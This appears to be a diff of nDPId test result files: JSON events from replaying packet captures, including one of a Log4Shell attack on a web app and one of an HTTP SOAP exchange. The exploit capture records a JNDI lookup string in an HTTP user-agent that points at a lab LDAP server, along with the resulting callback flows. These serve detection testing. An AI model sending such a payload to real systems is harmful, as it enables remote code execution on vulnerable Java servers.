Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}}
00355{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"thread_id":0,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682}
00355{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAAAAQAGAkKsEO4LAAAIBgABCAAGBAACAkKsEO4LrBDuCwJCrBDuCqwQ7go="} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAAAAQAGAkKsEO4LAAAIBgABCAAGBAACAkKsEO4LrBDuCwJCrBDuCqwQ7go="}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"thread_id":0,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="}
@@ -24,10 +24,10 @@
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="}
00356{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIBgABCAAGBAABAkJ2jzQWrBDuAQAAAAAAAKwQ7go="} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIBgABCAAGBAABAkJ2jzQWrBDuAQAAAAAAAKwQ7go="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"thread_id":0,"packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869}
00356{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAACAkKsEO4KrBDuCgJCdo80FqwQ7gE="} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAACAkKsEO4KrBDuCgJCdo80FqwQ7gE="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"thread_id":0,"packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":113,"packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="}
@@ -64,6 +64,6 @@
~~ total memory freed........: 4703648 bytes ~~ total memory freed........: 4703648 bytes
~~ total allocations/frees...: 101596/101596 ~~ total allocations/frees...: 101596/101596
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 215 chars ~~ json string min len.......: 201 chars
~~ json string max len.......: 1065 chars ~~ json string max len.......: 1065 chars
~~ json string avg len.......: 640 chars ~~ json string avg len.......: 633 chars

8
test/results/ndpi_match_string_subprotocol__error.pcapng.out
View File

@@ -6,8 +6,8 @@
01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} 01082{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}}
00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="} 00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="}
00499{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":8,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":1494,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-events-serialized":8,"global_ts_msec":1258165452647} 00499{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":8,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":1494,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-events-serialized":8,"global_ts_msec":1258165452647}
01084{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":576,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":576,"pkt_l4_len":0,"thread_ts_msec":1258165452652,"pkt":"AFBWmXinAB9to6gACABFAAoyGs1AADwGeykKAwkTCkSJdp64H5sj28X747el5lAYwhBevQAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aVhlIEhUVFAvMS4xDQpTT09QQWN0aW9uOiANCkNvbnRlbnQtdHlwZTogQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogMzQ0DQoNCjxzb2FwZW52OkVudmVsb3BlIHhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zcmFwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpC8WR5PgogICAgPG5zOmdldENvbmZpZ3VyZWRUZW1wbGF0ZT4KICAgICAgPG9iamVjdE5hbWU+TldNOToxLTEtMS0xOTwvb2JqZWN0TmFtZT4KICAgICAgPHRlbXBsYXRlTmFtZT5YRFNMX0FUTV9QVE08L3RlbXBsYXRlTmFtZT4KICAgIDwvbnM6Z6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01070{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":576,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":576,"pkt_l4_len":0,"thread_ts_msec":1258165452652,"pkt":"AFBWmXinAB9to6gACABFAAoyGs1AADwGeykKAwkTCkSJdp64H5sj28X747el5lAYwhBevQAAUE9TVCAvQXBjbi9BcGNSZW1vdGVTZXJ2aVhlIEhUVFAvMS4xDQpTT09QQWN0aW9uOiANCkNvbnRlbnQtdHlwZTogQXBwbGljYXRpb24veG1sDQpVc2VyLUFnZW50OiBKYWthcnRhIENvbW1vbnMtSHR0cENsaWVudC8zLjAuMQ0KSG9zdDogMTAuNjguMTM3LjExODo4MDkxDQpDb250ZW50LUxlbmd0aDogMzQ0DQoNCjxzb2FwZW52OkVudmVsb3BlIHhtbG5zOm5zPSJ1cmk6Ly9hbGNhdGVsLmNvbS9hcGMvMi4wIiB4bWxuczpzb2FwZW52PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zcmFwL2VudmVsb3BlLyI+CiAgPHNvYXBlbnY6SGVhZGVyLz4KICA8c29hcGVudjpC8WR5PgogICAgPG5zOmdldENvbmZpZ3VyZWRUZW1wbGF0ZT4KICAgICAgPG9iamVjdE5hbWU+TldNOToxLTEtMS0xOTwvb2JqZWN0TmFtZT4KICAgICAgPHRlbXBsYXRlTmFtZT5YRFNMX0FUTV9QVE08L3RlbXBsYXRlTmFtZT4KICAgIDwvbnM6Z6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00248{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","l4_data_len":542,"global_ts_msec":1258165452669} 00234{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":10,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","l4_data_len":542,"global_ts_msec":1258165452669}
00958{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2179,"flow_avg_l4_payload_len":167,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00958{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2179,"flow_avg_l4_payload_len":167,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 